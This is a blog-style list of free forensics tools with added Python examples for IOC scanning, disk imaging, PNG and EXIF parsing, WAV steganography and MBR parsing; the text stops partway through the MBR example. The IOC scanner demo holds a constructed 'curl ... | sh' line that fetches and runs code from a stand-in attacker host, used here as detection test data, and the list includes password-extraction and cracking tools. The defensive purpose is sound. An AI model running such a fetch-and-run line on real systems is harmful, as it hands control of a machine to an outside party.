Penetration Testing Tools, ML and Linux Tutorials
Cyber Forensics

Computer Forensics Resources

Posted by Stella Sebastian December 15, 2021


Forensics

A curated list of free forensic analysis tools and resources, grouped by the stage of an investigation they support (acquisition, memory, network, live response, artifact parsing, decryption and case management).


Distributions

Name | Description | Download
bitscout | Bitscout is a customizable live OS constructor tool written entirely in bash. Its main purpose is to help you quickly create your own remote forensics bootable disk image. | github
Remnux | REMnux® is a Linux toolkit for reverse-engineering and analyzing malicious software. REMnux provides a curated collection of free tools created by the community. Analysts can use it to investigate malware without having to find, install, and configure the tools. | Download
SANS Investigative Forensics Toolkit (SIFT) | Linux distribution for forensic analysis. | github
Tsurugi Linux | Tsurugi Linux is a DFIR open-source project that is, and will remain, totally free and independent, without involving any commercial brand. Its main goal is to share knowledge and "give back to the community". | Download
WinFE | WinFE (Windows Forensic Environment) boots on UEFI as well as legacy BIOS systems without changing firmware settings, so devices such as the Microsoft Surface Pro can be forensically imaged. BitLocker volumes are supported provided that you have the recovery key or password. | Download

Frameworks

Name | Description | Download
Autopsy | Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It is used by law enforcement, military, and corporate examiners to investigate what happened on a computer. You can even use it to recover photos from your camera's memory card. | Download
dff | DFF (Digital Forensics Framework) is a forensics framework with command-line and graphical interfaces. DFF can be used to investigate hard drives and volatile memory and to create reports about user and system activities. | github
dexter | Forensics acquisition framework designed to be extensible and secure. | github
IntelMQ | IntelMQ is a solution for IT security teams for collecting and processing security feeds using a message queuing protocol. | github
Kuiper | Kuiper is a digital investigation platform that gives an investigation team, or an individual examiner, the ability to parse, search and visualize collected evidence (for example, evidence collected by a fast-triage script such as Hoarder). | github
Laika BOSS | Laika BOSS: Object Scanning System. | github
PowerForensics | PowerForensics provides an all-in-one platform for live disk forensic analysis. | github
The Sleuth Kit | The Sleuth Kit® (TSK) is a library and collection of command-line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools, and the command-line tools can be used directly to find evidence. | github
turbinia | Turbinia is an open-source framework for deploying, managing, and running forensic workloads on cloud platforms. | github
IPED (Indexador e Processador de Evidências Digitais) | IPED Digital Forensic Tool: open-source software that can be used to process and analyze digital evidence, often seized at crime scenes by law enforcement or in a corporate investigation by private examiners. | github
Wombat Forensics | Wombat Forensics is a forensic analysis tool built entirely in C and C++. The GUI is built with Qt5, so it may one day work on Windows, Linux and Macintosh systems. | github
binwalk | Firmware analysis tool. | github

Memory Forensics

Name | Description | Download
inVtero.net | High-speed memory analysis framework developed in .NET; supports all Windows x64 versions and includes code-integrity checking and write support. | github
KeeFarce | Extracts passwords from a KeePass 2.x database directly from memory. | github
MemProcFS | An easy and convenient way of accessing physical memory as files in a virtual file system. | github
Rekall | Rekall Memory Forensic Framework. | github
volatility | The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. | github
VolUtility | Web app for the Volatility framework. | github

Network Forensics

Name | Description | Download
NetworkMiner | NetworkMiner is an open-source Network Forensic Analysis Tool (NFAT) for Windows (it also works on Linux, Mac OS X and FreeBSD). NetworkMiner can be used as a passive network sniffer/packet-capturing tool in order to detect operating systems, sessions, hostnames, open ports and more. | Download
Wireshark | Wireshark is the world's foremost and most widely used network protocol analyzer. It lets you see what is happening on your network at a microscopic level and is the de facto (and often de jure) standard across many commercial and non-profit enterprises, government agencies, and educational institutions. | Download

Live Forensics

Name | Description | Download
grr | GRR Rapid Response: remote live forensics for incident response. | github
Linux Expl0rer | Easy-to-use live forensics toolbox for Linux endpoints, written in Python and Flask. | github
mig | Distributed and real-time digital forensics at the speed of the cloud. | github
osquery | SQL-powered operating system analytics. | github
UAC | UAC (Unix-like Artifacts Collector) is a live-response collection tool for incident response that uses built-in tools to automate the collection of artifacts from Unix-like systems. Supported systems: AIX, FreeBSD, Linux, macOS, NetBSD, Netscaler, OpenBSD and Solaris. | github

IOC Scanner

Name | Description | Download
Fenrir | Fenrir is a simple IOC scanner written as a bash script. | github
Loki | Scanner for simple indicators of compromise. | github
Redline | Redline®, FireEye's free endpoint security tool, provides host investigative capabilities to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile. | Download
THOR Lite | THOR Lite includes the file system and process scan modules as well as a module that extracts "autoruns" information on the different platforms. | Download
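The scanners above share one design: walk the file system and match each file against a small set of indicator types. The following is an added example of that loop, written for this page and not taken from Fenrir, Loki or THOR. It checks three indicator classes per file (SHA-256 hash, filename regex, byte string in content), skips symlinks so a planted link cannot redirect the scan, and runs against a constructed directory tree with constructed indicators; the hostname, file names and hash below are demo values, not real IOCs.

```python
"""Minimal file-system IOC scanner in the spirit of Fenrir/Loki (added example)."""
import hashlib
import os
import re
import tempfile
from pathlib import Path

MAX_SCAN_BYTES = 8 * 1024 * 1024  # assumed cap: skip content matching on larger files


class IOCSet:
    """Indicators to look for: hex SHA-256 digests, filename regexes, content strings."""

    def __init__(self, hashes, filename_patterns, strings):
        self.hashes = {h.lower() for h in hashes}
        self.filename_res = [re.compile(p, re.IGNORECASE) for p in filename_patterns]
        self.strings = [s.encode() if isinstance(s, str) else s for s in strings]


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for buf in iter(lambda: fh.read(1 << 20), b""):
            h.update(buf)
    return h.hexdigest()


def scan_file(path: Path, iocs: IOCSet) -> list:
    """Return the IOC hits for one file: 'hash', 'filename:<pattern>' or 'string:<s>'."""
    hits = [f"filename:{r.pattern}" for r in iocs.filename_res if r.search(path.name)]
    try:
        digest = sha256_file(path)
    except OSError:
        return hits  # unreadable (permissions, vanished): report what is known
    if digest in iocs.hashes:
        hits.append("hash")
    if path.stat().st_size <= MAX_SCAN_BYTES:
        data = path.read_bytes()
        hits.extend(f"string:{s.decode(errors='replace')}" for s in iocs.strings if s in data)
    return hits


def scan_tree(root: Path, iocs: IOCSet) -> dict:
    """Walk root without following symlinks; map relative path -> hits for matching files."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            hits = scan_file(p, iocs)
            if hits:
                findings[str(p.relative_to(root))] = hits
    return findings


def demo() -> dict:
    """Build a constructed tree (one benign, two suspicious files) and scan it."""
    bad_payload = b"#!/bin/sh\ncurl http://c2.example.invalid/a | sh\n"  # constructed sample
    iocs = IOCSet(
        hashes=[hashlib.sha256(bad_payload).hexdigest()],     # constructed hash IOC
        filename_patterns=[r"^mimikatz.*\.exe$", r"\.(lnk|scr)\.exe$"],
        strings=["c2.example.invalid"],                        # constructed string IOC
    )
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "tmp").mkdir()
        (root / "tmp" / "update.sh").write_bytes(bad_payload)    # hash + string hit
        (root / "mimikatz_x64.exe").write_bytes(b"MZ\x90\x00")   # filename hit only
        (root / "notes.txt").write_text("nothing to see here\n")  # clean
        return scan_tree(root, iocs)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Hashing is done before content matching so an unreadable file is still reported on its name, and the content match is capped by size so a multi-gigabyte file cannot stall the sweep; real scanners add YARA rules and per-process scanning on top of the same loop.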

Imaging

Name | Description | Download
dc3dd | A patched version of GNU dd with several features intended for forensic acquisition of data. Highlights include hashing on the fly, split output files, pattern writing, a progress meter, and file verification. | Download
dcfldd | dcfldd is an enhanced version of GNU dd with features useful for forensics and security. | Download
FTK Imager | Free imaging tool for Windows. | Download
Guymager | Open-source disk imaging tool for Linux systems. | Download
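What separates dc3dd and dcfldd from plain dd is that the hash is computed from the same buffers that are written, the output can be split into segments, and the written segments are read back and compared. The following added example, written for this page and not the code of either tool, does those three steps on a constructed 2.5 MiB file that stands in for a block device; the segment names (image.000, image.001, ...) and the 1 MiB read size are assumptions of the demo. On a real system the source would be /dev/sdX opened read-only behind a write blocker.

```python
"""dd-style acquisition with on-the-fly hashing, split output and verification (added example)."""
import hashlib
import os
import tempfile
from pathlib import Path

CHUNK = 1024 * 1024  # read size (assumed); demo() also uses it as the split size


def acquire(source: Path, dest_dir: Path, split_bytes: int, algos=("md5", "sha256")) -> dict:
    """Copy `source` into dest_dir/image.NNN segments of at most split_bytes each.

    The hashes are updated from the very buffers that are written, so they describe
    the data as read from the device; verify() later proves the segments match it.
    """
    hashes = {a: hashlib.new(a) for a in algos}
    segments, total, seg_fh, seg_written = [], 0, None, 0
    with source.open("rb") as src:
        for buf in iter(lambda: src.read(CHUNK), b""):
            for h in hashes.values():
                h.update(buf)
            total += len(buf)
            view = memoryview(buf)
            while len(view):                      # spread buf across segment boundaries
                if seg_fh is None:
                    path = dest_dir / f"image.{len(segments):03d}"
                    seg_fh = path.open("wb")
                    segments.append(path)
                    seg_written = 0
                take = view[:split_bytes - seg_written]
                seg_fh.write(take)
                seg_written += len(take)
                view = view[len(take):]
                if seg_written == split_bytes:
                    seg_fh.close()
                    seg_fh = None
    if seg_fh is not None:
        seg_fh.close()
    return {"bytes": total, "segments": segments,
            "hashes": {a: h.hexdigest() for a, h in hashes.items()}}


def verify(segments, expected: dict) -> bool:
    """Re-read the segments in order and compare against the acquisition hashes."""
    hashes = {a: hashlib.new(a) for a in expected}
    for seg in segments:
        with open(seg, "rb") as fh:
            for buf in iter(lambda: fh.read(CHUNK), b""):
                for h in hashes.values():
                    h.update(buf)
    return {a: h.hexdigest() for a, h in hashes.items()} == expected


def demo() -> dict:
    """Image a constructed 2.5 MiB 'device' into 1 MiB segments, verify, tamper, re-verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        device = root / "device.bin"
        device.write_bytes(os.urandom(2 * CHUNK + CHUNK // 2))  # constructed source data
        evidence = root / "evidence"
        evidence.mkdir()
        result = acquire(device, evidence, split_bytes=CHUNK)
        result["segment_count"] = len(result["segments"])
        result["verified"] = verify(result["segments"], result["hashes"])
        # flip one byte in the second segment: a single bad byte must fail verification
        with open(result["segments"][1], "r+b") as fh:
            fh.seek(10)
            original = fh.read(1)
            fh.seek(10)
            fh.write(bytes([original[0] ^ 0xFF]))
        result["verified_after_tamper"] = verify(result["segments"], result["hashes"])
        return result


if __name__ == "__main__":
    r = demo()
    print(f"{r['bytes']} bytes in {r['segment_count']} segments; "
          f"verified={r['verified']}, after tamper={r['verified_after_tamper']}")
    for algo, digest in r["hashes"].items():
        print(f"{algo}: {digest}")
```

Record the returned hashes in the acquisition notes before anything touches the segments; the verify step is what lets you later show that the image you analysed is the one you acquired.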

Windows Artifacts

Name | Description | Download
Beagle | Transform data sources and logs into graphs. | github
FRED | Cross-platform Microsoft registry hive editor. | Download
LastActivityView | LastActivityView by NirSoft is a tool for Windows that collects information from various sources on a running system and displays a log of actions made by the user and events that occurred on the computer. | Download
LogonTracer | Investigate malicious Windows logons by visualizing and analyzing the Windows event log. | github
python-evt | Pure-Python parser for classic Windows Event Log files (.evt). | github
RegRipper 3.0 | RegRipper is an open-source Perl tool for parsing the Registry and presenting it for analysis. | github
RegRippy | A framework for reading and extracting useful forensic data from Windows registry hives. | github

OS X Forensics

Name | Description | Download
APFS Fuse | A read-only FUSE driver for the Apple File System. It also supports software-encrypted volumes and Fusion Drives. Firmlinks are not supported yet. | github
mac_apt (macOS Artifact Parsing Tool) | mac_apt is a DFIR (Digital Forensics and Incident Response) tool to process full disk images of Mac computers (or live machines) and extract data and metadata useful for a forensic investigation. | github
MacLocationsScraper | Dump the contents of the location database files on iOS and macOS. | github
macMRUParser | Python script to parse the Most Recently Used (MRU) plist files on macOS into a more human-friendly format. | github
OSXAuditor | OS X Auditor is a free Mac OS X computer forensics tool. | github
OSXCollector | OSXCollector is a forensic evidence collection and analysis toolkit for OS X. | github

Mobile Forensics

Name | Description | Download
Andriller | Andriller is a software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices. | github
ALEAPP | Android Logs, Events And Protobuf Parser. | github
ArtEx | A forensic tool published by DoubleBlak Digital Forensics, a site aimed at helping forensic examiners and run by Ian Whiffin, a former law-enforcement digital forensics examiner with a mid-sized municipal police agency. | Download
iLEAPP | An iOS Logs, Events, And Plists Parser. | github
iOS Frequent Locations Dumper | Dump the contents of the StateModel#.archive files located in /private/var/mobile/Library/Caches/com.apple.routined/ | github
MEAT | Perform different kinds of acquisitions on iOS devices. | github
MobSF | An automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. | github
OpenBackupExtractor | An app for extracting data from iPhone and iPad backups. | github

Docker Forensics

Name | Description | Download
dof (Docker Forensics Toolkit) | A toolkit for the post-mortem examination of Docker containers from forensic HDD copies. | github
Docker Explorer | Extracts and interprets forensic artifacts from disk images of Docker host systems. | github

Picture Analysis

Name | Description | Download
Ghiro | A fully automated tool designed to run forensic analysis over a massive number of images. | Download
sherloq | An open-source digital image forensic toolset. Forensic image analysis is the application of image science and domain expertise to interpret the content of an image, and/or the image itself, in legal matters. | github
Image Analyzer | A Windows program for viewing and editing image files with a plain, somewhat dated interface. Pictures are opened through the file browser only (drag and drop is not supported); file-format options such as compression level, transparent colour key, quality and file size can be configured. | Download
pngcheck | pngcheck verifies the integrity of PNG, JNG and MNG files (by checking the internal 32-bit CRCs, a.k.a. checksums, and decompressing the image data); it can optionally dump almost all of the chunk-level information in the image in human-readable form. For example, it can be used to print the basic statistics about an image (dimensions, bit depth, etc.), to list the color and transparency info in its palette (assuming it has one), or to extract the embedded text annotations. It is a command-line program with batch capabilities. | Download
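The CRC and chunk checks pngcheck performs are easy to reproduce, and doing so shows what a "bad CRC" finding actually means: each PNG chunk carries a CRC-32 over its type and payload, so a chunk whose bytes were edited after the fact (or a file with data appended after IEND) is detectable from structure alone. The following is an added example written for this page, not pngcheck's code; it builds a 1x1 PNG inline with a tEXt annotation, then verifies every chunk, pulls out the text and reports trailing bytes after IEND.

```python
"""PNG chunk walker with CRC-32 verification and tEXt extraction (added example)."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def iter_chunks(data: bytes):
    """Yield (type, payload, crc_ok, offset) for each chunk, stopping after IEND."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad 8-byte signature")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) != length or len(crc_bytes) != 4:
            raise ValueError(f"truncated chunk {ctype!r} at offset {pos}")
        # the CRC covers the type field and the payload, not the length field
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == struct.unpack(">I", crc_bytes)[0]
        yield ctype.decode("latin-1"), payload, crc_ok, pos
        pos += 12 + length
        if ctype == b"IEND":
            break


def check_png(data: bytes) -> dict:
    """Summarise a PNG: header fields, text annotations, chunks with bad CRCs, trailing bytes."""
    info = {"chunks": [], "bad_crc": [], "texts": {}, "trailing_bytes": None}
    for ctype, payload, ok, pos in iter_chunks(data):
        info["chunks"].append(ctype)
        if not ok:
            info["bad_crc"].append(ctype)
        if ctype == "IHDR":
            w, h, depth, color = struct.unpack(">IIBB", payload[:10])
            info.update(width=w, height=h, bit_depth=depth, color_type=color)
        elif ctype == "tEXt":
            key, _, val = payload.partition(b"\x00")
            info["texts"][key.decode("latin-1")] = val.decode("latin-1")
        elif ctype == "IEND":
            info["trailing_bytes"] = len(data) - (pos + 12)  # data after IEND hides payloads
    return info


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png(trailer: bytes = b"") -> bytes:
    """Constructed 1x1 RGB PNG with a tEXt comment; optional bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, truecolor
    raw = b"\x00" + b"\xff\x00\x00"                        # filter byte + one red pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"tEXt", b"Comment\x00made by examiner")
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"") + trailer)


def corrupt_idat(png: bytes) -> bytes:
    """Flip one byte of the IDAT payload without updating its stored CRC."""
    i = png.index(b"IDAT") + 4
    return png[:i] + bytes([png[i] ^ 0xFF]) + png[i + 1:]


if __name__ == "__main__":
    for label, sample in [("clean", build_sample_png()),
                          ("trailer", build_sample_png(b"hidden")),
                          ("bad crc", corrupt_idat(build_sample_png()))]:
        print(label, check_png(sample))
```

A clean CRC does not prove an image is untouched (an editor recomputes CRCs), but a bad CRC on a chunk that decodes fine, or bytes after IEND, is a reliable sign that something other than an image library wrote the file.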

Metadata Forensics

Name | Description | Download
ExifTool | ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files. | Download
FOCA | FOCA is a tool used mainly to find metadata and hidden information in documents. | github
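ExifTool's read path for JPEG boils down to locating the APP1 segment and walking the TIFF image file directories inside it. The added example below, written for this page and not ExifTool's code, does exactly that: it scans JPEG marker segments for "Exif", reads IFD0, follows the Exif and GPS sub-IFD pointers, and decodes ASCII, integer and rational fields. The JPEG it parses is constructed inline (SOI, one APP1 segment, EOI, no scan data) and the tag-name table is deliberately short; unknown tags are reported as hex.

```python
"""EXIF extraction from JPEG by walking APP1/TIFF IFDs (added example, not ExifTool)."""
import struct
from typing import Optional

TAGS = {0x010F: "Make", 0x0110: "Model", 0x0112: "Orientation", 0x0131: "Software",
        0x0132: "DateTime", 0x9003: "DateTimeOriginal", 0x9004: "DateTimeDigitized"}
SUB_IFD = {0x8769: "Exif", 0x8825: "GPS"}                       # pointers to nested IFDs
TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1, 9: 4, 10: 8}  # TIFF field types


def find_exif(jpeg: bytes) -> Optional[bytes]:
    """Return the TIFF blob from the APP1 'Exif' segment, or None if absent."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (no SOI marker)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):               # EOI or SOS: no more metadata segments
            break
        seglen = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            return seg[6:]
        pos += 2 + seglen
    return None


def _decode(E: str, typ: int, cnt: int, raw: bytes):
    """Raw field bytes -> str / int / float / tuple / bytes according to the TIFF type."""
    if typ == 2:
        return raw.rstrip(b"\x00").decode("ascii", errors="replace")
    if typ in (3, 4, 9):
        vals = struct.unpack(E + {3: "H", 4: "I", 9: "i"}[typ] * cnt, raw)
        return vals[0] if cnt == 1 else vals
    if typ in (5, 10):
        n = struct.unpack(E + ("II" if typ == 5 else "ii") * cnt, raw)
        vals = tuple(n[i] / n[i + 1] if n[i + 1] else float("nan") for i in range(0, 2 * cnt, 2))
        return vals[0] if cnt == 1 else vals
    return raw                                   # BYTE / UNDEFINED: keep the bytes


def parse_tiff(tiff: bytes) -> dict:
    """Walk IFD0 plus Exif/GPS sub-IFDs; keys are 'Name', 'Exif/Name', 'GPS/0xTAG'."""
    E = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if E is None or len(tiff) < 8 or struct.unpack(E + "H", tiff[2:4])[0] != 42:
        raise ValueError("bad TIFF header")
    tags, seen = {}, set()

    def read_ifd(off: int, prefix: str) -> None:
        if off in seen or off + 2 > len(tiff):
            return                               # pointer loop or out of range: damaged/hostile
        seen.add(off)
        (n,) = struct.unpack(E + "H", tiff[off:off + 2])
        for i in range(n):
            ent = tiff[off + 2 + 12 * i:off + 14 + 12 * i]
            if len(ent) < 12:
                return
            tag, typ, cnt = struct.unpack(E + "HHI", ent[:8])
            size = TYPE_SIZE.get(typ)
            if size is None:
                continue                         # unknown type: skip rather than guess
            total = size * cnt
            if total <= 4:
                raw = ent[8:8 + total]           # short values live inline, left-justified
            else:
                (ptr,) = struct.unpack(E + "I", ent[8:12])
                raw = tiff[ptr:ptr + total]
            if len(raw) != total:
                continue                         # offset points past the end of the blob
            if tag in SUB_IFD and typ == 4 and cnt == 1:
                read_ifd(_decode(E, typ, cnt, raw), SUB_IFD[tag] + "/")
            else:
                tags[prefix + TAGS.get(tag, f"0x{tag:04X}")] = _decode(E, typ, cnt, raw)

    read_ifd(struct.unpack(E + "I", tiff[4:8])[0], "")
    return tags


def extract_exif(jpeg: bytes) -> dict:
    tiff = find_exif(jpeg)
    return parse_tiff(tiff) if tiff else {}


def build_sample_jpeg() -> bytes:
    """Constructed little-endian Exif: Make, Orientation, Software, Exif IFD with DateTimeOriginal."""
    make, soft, dto = b"Acme\x00", b"ExamplePhotoApp 1.0\x00", b"2021:12:15 10:30:00\x00"
    ifd0_off, ifd0_len = 8, 2 + 4 * 12 + 4
    make_off = ifd0_off + ifd0_len
    soft_off = make_off + len(make)
    exif_off = soft_off + len(soft) + 1          # one pad byte keeps the sub-IFD offset even
    dto_off = exif_off + 2 + 12 + 4
    ent = lambda tag, typ, cnt, val: struct.pack("<HHII", tag, typ, cnt, val)
    ifd0 = (struct.pack("<H", 4) + ent(0x010F, 2, len(make), make_off) + ent(0x0112, 3, 1, 1)
            + ent(0x0131, 2, len(soft), soft_off) + ent(0x8769, 4, 1, exif_off) + struct.pack("<I", 0))
    exif = struct.pack("<H", 1) + ent(0x9003, 2, len(dto), dto_off) + struct.pack("<I", 0)
    tiff = b"II\x2a\x00" + struct.pack("<I", ifd0_off) + ifd0 + make + soft + b"\x00" + exif + dto
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    for name, value in extract_exif(build_sample_jpeg()).items():
        print(f"{name}: {value}")
```

The bounds checks and the visited-offset set are not pedantry: EXIF parsers are a known attack surface, and a forensic workstation processes files an adversary may have prepared.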

Steganography

Name | Description | Download
Sonic Visualiser | Sonic Visualiser is a free, open-source application for Windows, Linux, and Mac, designed to be the first program you reach for when you want to study a music recording closely. | Download
Steghide | A steganography program that hides data in various kinds of image and audio files. | github
Wavsteg | A steganographic coder for WAV files. | github
Zsteg | Detects data hidden in PNG and BMP files (LSB steganography, zlib-compressed payloads and several tool-specific schemes). | github
Outguess | Outguess is an advanced steganography tool. Outguess will conceal your document inside an image (JPG) of your choice. | github
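To see what tools like Wavsteg do, and what a detector like zsteg looks for, it helps to embed and recover a payload by hand. The added example below, written for this page and not the code of any tool listed, hides a message in the least-significant bit of each 16-bit PCM sample of a WAV file, recovers it, and then runs a zsteg-style check that rebuilds the LSB plane into bytes and reports printable runs. The carrier is a constructed one-second sine tone written with the standard-library wave module, and the 32-bit length header is a convention of this demo, not a standard.

```python
"""LSB steganography in 16-bit WAV samples, plus an LSB-plane strings check (added example)."""
import io
import math
import struct
import wave


def make_carrier(seconds: float = 1.0, rate: int = 8000, freq: float = 440.0) -> bytes:
    """Constructed mono 16-bit PCM WAV (a sine tone), returned as file bytes."""
    n = int(seconds * rate)
    frames = b"".join(struct.pack("<h", int(12000 * math.sin(2 * math.pi * freq * i / rate)))
                      for i in range(n))
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(frames)
    return buf.getvalue()


def _samples(wav_bytes: bytes):
    """Return (wave params, list of signed 16-bit samples)."""
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        params = w.getparams()
        if params.sampwidth != 2:
            raise ValueError("demo handles 16-bit PCM only")
        frames = w.readframes(params.nframes)
    count = params.nframes * params.nchannels
    return params, list(struct.unpack(f"<{count}h", frames))


def embed(wav_bytes: bytes, message: bytes) -> bytes:
    """Write a 32-bit length then the message, one bit per sample LSB, MSB first."""
    params, samples = _samples(wav_bytes)
    payload = struct.pack(">I", len(message)) + message
    bits = [(b >> (7 - k)) & 1 for b in payload for k in range(8)]
    if len(bits) > len(samples):
        raise ValueError(f"carrier holds {len(samples) // 8} bytes, payload needs {len(payload)}")
    for i, bit in enumerate(bits):
        samples[i] = (samples[i] & ~1) | bit      # stays within int16 range
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setparams(params)
        w.writeframes(struct.pack(f"<{len(samples)}h", *samples))
    return buf.getvalue()


def _lsb_bytes(samples, start_bit: int, nbytes: int) -> bytes:
    out = bytearray()
    for i in range(nbytes):
        v = 0
        for k in range(8):
            v = (v << 1) | (samples[start_bit + i * 8 + k] & 1)
        out.append(v)
    return bytes(out)


def extract(wav_bytes: bytes) -> bytes:
    """Read the length header and the message back; refuse lengths the carrier cannot hold."""
    _, samples = _samples(wav_bytes)
    length = struct.unpack(">I", _lsb_bytes(samples, 0, 4))[0]
    if 32 + length * 8 > len(samples):
        raise ValueError("length header inconsistent with carrier size: probably no payload")
    return _lsb_bytes(samples, 32, length)


def lsb_strings(wav_bytes: bytes, min_len: int = 8) -> list:
    """zsteg-style check: rebuild the LSB plane as bytes and report printable ASCII runs."""
    _, samples = _samples(wav_bytes)
    raw = _lsb_bytes(samples, 0, len(samples) // 8)
    runs, cur = [], bytearray()
    for b in raw + b"\x00":                       # sentinel flushes the final run
        if 32 <= b < 127:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                runs.append(cur.decode("ascii"))
            cur = bytearray()
    return runs


if __name__ == "__main__":
    carrier = make_carrier()
    stego = embed(carrier, b"meet at the usual place 21:00")  # constructed message
    print("recovered:", extract(stego))
    print("printable runs in LSB plane:", lsb_strings(stego))
```

The string scan is the cheap first pass an examiner runs on a suspect file; an encrypted or compressed payload defeats it, which is why the real tools add statistical tests on the LSB plane and try several bit orderings and channels.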

Management

Name | Description | Download
dfirtrack | Digital Forensics and Incident Response Tracking application; tracks systems. | github
Incidents | Web application for organizing non-trivial security investigations. Built on the idea that incidents are trees of tickets, where some tickets are leads. | github

Decryption

Name | Description | Download
hashcat | Fast password cracker with GPU support. | Download
John the Ripper | John the Ripper is an open-source password security auditing and password recovery tool available for many operating systems. John the Ripper jumbo supports hundreds of hash and cipher types, including: user passwords of Unix flavors (Linux, *BSD, Solaris, AIX, QNX, etc.), macOS, Windows, "web apps" (e.g., WordPress), groupware (e.g., Notes/Domino), and database servers (SQL, LDAP, etc.); network traffic captures (Windows network authentication, WiFi WPA-PSK, etc.); encrypted private keys (SSH, GnuPG, cryptocurrency wallets, etc.); filesystems and disks (macOS .dmg files and "sparse bundles", Windows BitLocker, etc.); archives (ZIP, RAR, 7z); and document files (PDF, Microsoft Office, etc.). These are just some examples; there are many more. | Download

Disk image handling

Name | Description | Download
Disk Arbitrator | A Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device. | github
imagemounter | Command-line utility and Python package to ease the (un)mounting of forensic disk images. | github
libewf | Libewf is a library and a set of tools to access the Expert Witness Compression Format (EWF, E01). | github
PancakeViewer | Disk image viewer based on dfvfs, similar to the FTK Imager viewer. | github
xmount | Convert between different disk image formats. | Download
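Once an image is mounted or converted with the tools above, the first question is what volumes it contains, which is what mmls from The Sleuth Kit (listed under Frameworks) answers for a DOS partition table. The following added example, written for this page and not code from The Sleuth Kit or any tool listed, reads the four primary MBR entries of sector 0, checks the boot signature, flags overlapping entries and lists unallocated sector ranges. Sector 0 is constructed inline with two partitions; a 512-byte sector size is assumed, and extended partitions (EBR chains) and GPT are out of scope.

```python
"""mmls-style partition listing from a raw image's MBR (added example, not The Sleuth Kit)."""
import struct

SECTOR = 512  # assumed sector size

# a few common MBR partition type IDs, for display only
PART_TYPES = {
    0x05: "Extended", 0x07: "NTFS/exFAT/HPFS", 0x0B: "FAT32", 0x0C: "FAT32 (LBA)",
    0x0F: "Extended (LBA)", 0x82: "Linux swap", 0x83: "Linux", 0xEE: "GPT protective",
}


def parse_mbr(sector0: bytes) -> list:
    """Return the non-empty primary partition entries of sector 0 as dicts.

    The 0x55AA boot signature is checked first: without it the table cannot be
    trusted and the examiner should carve for file system headers instead.
    """
    if len(sector0) < SECTOR:
        raise ValueError("need a full 512-byte sector 0")
    if sector0[510:512] != b"\x55\xaa":
        raise ValueError("missing MBR boot signature 0x55AA")
    parts = []
    for slot in range(4):
        entry = sector0[446 + 16 * slot:446 + 16 * (slot + 1)]
        # boot flag, CHS start (skipped), type, CHS end (skipped), LBA start, sector count
        boot, ptype, start, length = struct.unpack("<B3xB3xII", entry)
        if ptype == 0 or length == 0:
            continue  # unused slot
        parts.append({
            "slot": slot, "bootable": boot == 0x80, "type_id": ptype,
            "type": PART_TYPES.get(ptype, f"unknown (0x{ptype:02X})"),
            "start": start, "length": length, "end": start + length - 1,
        })
    return parts


def find_overlaps(parts: list) -> list:
    """Pairs of slots whose sector ranges overlap: a sign of a damaged or tampered table."""
    ordered = sorted(parts, key=lambda p: p["start"])
    return [(a["slot"], b["slot"]) for a, b in zip(ordered, ordered[1:]) if b["start"] <= a["end"]]


def unallocated(parts: list, total_sectors: int) -> list:
    """(start, end) sector ranges covered by no partition; mmls shows these as Unallocated."""
    gaps, cursor = [], 1  # sector 0 is the MBR itself
    for p in sorted(parts, key=lambda p: p["start"]):
        if p["start"] > cursor:
            gaps.append((cursor, p["start"] - 1))
        cursor = max(cursor, p["end"] + 1)
    if cursor < total_sectors:
        gaps.append((cursor, total_sectors - 1))
    return gaps


def build_sample_mbr() -> bytes:
    """Constructed sector 0: a bootable NTFS partition followed by a Linux partition."""
    sec = bytearray(SECTOR)
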